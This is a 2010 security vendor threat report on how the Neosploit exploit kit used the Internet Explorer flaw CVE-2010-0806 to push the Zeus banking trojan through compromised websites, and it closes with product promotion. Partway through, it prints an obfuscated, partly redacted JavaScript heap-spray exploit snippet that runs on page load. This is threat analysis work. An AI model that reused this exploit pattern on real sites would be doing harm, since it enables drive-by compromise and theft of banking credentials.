AVG

WEB INTELLIGENCE REPORT

APRIL 2010

THE EPIDEMIC OF CVE-2010-0806 FOLLOWING A PUBLIC DISCLOSURE

Introduction
Cybercriminals keep on targeting innocent online users. They refine their methods, and search for new
ways to maximize their illegal profit while minimizing their chance of detection. In this report, we will show
you how hackers managed to infect computers with their malware while taking advantage of an unpatched
Internet Explorer vulnerability (zero-day) that was disclosed to the public. We will expose the epidemic of
this zero-day vulnerability on the web and the impact it has on users browsing the web without protection.

Our research shows that a public disclosure information about an un-patched vulnerability (zero-day) leads to a swift
response by hackers. The disclosed information was embedded in an Exploit toolkit known as Neosploit and used by
several cybercriminal gangs around the globe. The exploit toolkit Neosploit is software written by hackers and sold online
to cybercriminals who use it to infect innocent web users with their malware. The toolkit includes everything the
cybercriminal needs to operate its attack – the malware, the exploit code, the statistic reports etc.

How did these cybercriminals find the information about the unpatched vulnerability? What means and
methods did they use to infect users? What is the epidemic rate of this attack? What can users do to
protect their digital assets?

In this report, we will shed some light on these questions, including the cybercrime toolkits they used.
CVE-2010-0806 and Public Disclosure
On March 9th Microsoft released an advisory regarding a vulnerability in its Internet Explorer products, versions 6
and 7. According to the information provided on this advisory, the vulnerability could allow remote code execution
(RCE). RCE means that an attacker who successfully exploits this vulnerability could gain the same user rights as a
logged-on user. For example, if the user is logged on with administrative user rights, an attacker who successfully
exploits this vulnerability could take complete control of an infected system. An attacker could then install
programs, view, change, or delete data, or create new accounts with full user rights.

Following the Microsoft advisory, CVE-2010-0806 was published to alert the public about the existence of such
vulnerability.

Typically, public vulnerability disclosures trigger security researchers to rush in and find out ‘what is under the
hood’. The race to find where exactly the vulnerability stands and how to exploit it was the obvious next step. The
‘race’ ended with a report from a security researcher who managed to find a site exploiting this vulnerability
already and used it for creating a public Proof-of-Concept (PoC) and module for the popular open source
penetration testing platform, Metasploit.

The debate as to whether such public disclosure is valuable to the security community or not has been around for
years. Some claim it helps the community to provide immediate protection against threats while others claim it
helps cybercriminals to trigger their attacks. We believe a responsible disclosure in the security community is a
better way to go.
The Epidemic of the Vulnerability as Detected by AVG

Not long after the PoC was published on the web, AVG spotted a major spike in compromised websites serving the
exploit code targeting the zero-day vulnerability. We concluded in our research that the exploit is being served by
an Exploit toolkit dubbed “Neosploit”. Neosploit has been known for some time already, however its price on the
black market started to decline because of the relatively old vulnerabilities it tries to exploit. It appears that the
people behind ‘Neosploit’ added this new exploit to its arsenal to increase its ‘market price’ again.

30002

25002

20002
Number of Hits

15002

10002

5002

2
1 2 3 4 5 6 7 8
Days from MS Advisory

Number of exploit serving websites following the public disclosure

Example of Compromised Website Serving the Exploit

Many users believe they can tell if a website is a legitimate one or a malicious one just by visiting it.

There are two false assumptions by this statement:

1. Today’s malicious code is invisible to users. Usually it’s a code embedded on the webpage that executes behind

the scene while the user just visits the web page. This is known as a ‘drive-by’ download.

2. Hackers are compromising legitimate websites and insert their malicious code into them. The reason is simple:

users are visiting legitimate sites more often than other sites.

Below is an example of a compromised website we spotted that automatically attempts to infect the user with an exploit.
Can you tell if this site is legitimate or one that serves malicious code? Probably not.
Here is the code behind this web page ….
As you can see at the bottom of the page, the hacker who compromised this website inserted a code that tries to infect the
user – this was probably not part of the original code the website owner wanted to have.

For security researchers the highlighted code is very common, but for the average web developer it will look suspicious or
unknown.

In order to minimize detection of the exploit code by security products, the hackers tried to hide their actions. The served
exploit code in this example was obfuscated. The main reason for obfuscating the code is to avoid detection of it by
traditional signature matching techniques used by security products.

<html><head><script>if (!self.self.navigator["taintEn" + "abled"]()) ue = unescape;

s = new Function(ue('%76%61%72%20%62%74%6E%20%3D%20%64%6F%63%75%6D%65%6E%74[REMOVED]%2E%63%72%65%61%74%65%45%6C%65%6D
%65%6E%6F%6E%22%29%3B%20%62%74%6E%2Ess = new Function('var c = ue("%u9090%[--REMOVED--]%u0000"); var array = new Array(); var ls = 0x86000 -
(c.length * 2); var b = ue("%u0c0c%u0c0C"); while (b.length < ls / 2) {b += b;} var lh = b.substring(0, ls / 2); delete b; for (i = 0; i < 270; i++) {array[i] = lh + lh + c;}');

hnd = new Function(ue('%73%73%28%29%3B%20%76%61%72%20%62%64%20%3D%20%64[REMOVED]%6F%63%75%6D%65%6E%74%2E

%63%72%65%61%74%654F%44%59%22%29%3B69%%7B%7D%20%77%69%6E%64%6F%77%2E%73%74%61%74%75%73%20%2B%3D%20%22%22%3B'));

</script></head><body onload="s()"></body></html>

Code snippet of Neosploit version for CVE-2010-0806.

The Malicious Code Hackers Tried to Install on the End-user PC

Infecting legitimate websites and serving code that exploits the CVE-201-0806 unpatched (zero-day) vulnerability was not
the main motivation of the hackers. They are looking to achieve another goal – to run a password stealing malware on the
end user PC. The password stealing malware is focusing on stealing the online banking credential of the users. The
malware that was used in the cases we investigated was the known Zeus bank Trojan.

Screenshot taken from Zeus Tracker website indicating on the served malware
How Can Users be Protected from These Attacks?
As indicated above, if attacks are designed to avoid detection by security products how can security products provide
protection?

This is a common question asked by many users. And the answer is simple: by using multiple security layers. Multiple
protection layers enhance the security as each layer is focusing on a different area than the other.

At AVG Technologies we have several layers that can detect such attacks, in real-time, by using:
1. Exploits detection layer using AVG LinkScanner
2. Code behavior layer using AVG IDP Engine
3. Heuristics analysis
4. Incoming and outgoing traffic inspection by AVG Firewall
5. URL reputation by AVG Data Feed
6. …and the traditional signature-based detection by AVG Anti-Virus

Blending together these six different protection layers and not relaying just on one layer (e.g. signatures) is our approach
to protecting against today’s web attacks. Below are two examples indicating how AVG security product successfully
detected and prevented the Exploit code and the actual malware used by the hacker.

The first is an example taken from AVG’s backend system. AVG LinkScanner reports back to our backend on each exploit it
detects on web pages that our users are visiting. Based on that data in this system we have real-time visibility into the
state of the Web, and we can identify new attacks worldwide. The screenshot below shows a site using Neosploit and
attempting to exploit the end user browser with the password stealing malware called Zeus.
The second example is a report from VirusTotal, indicating that AVG’s heuristics based detection managed to detect the
served malware as well.

In this report we managed to visualize what happens between the time that a vulnerability is discovered and used by hackers in-
the-wild, until a security patch become available by the product vendor. Knowing that users’ PCs are vulnerable, hackers are
rushing to ‘color’ the Web with their attacks. Even non technical hackers can join the ‘party’ by distributing the exploits using
readily available attack toolkits software packages.

Cybercriminals use this window of time to infect PCs and steal valuable personal, financial and business data that they can use or
trade for profit. The critical time puts a strain on users looking to protect their assets.

We at AVG Technologies provide users with a FREE product that detects and prevent such zero-day exploits, even when the patch
is still not available. Thanks to our 6 layers of protection and our unique LinkScanner exploit detection, users can protect their PCs
and minimize their risk while online.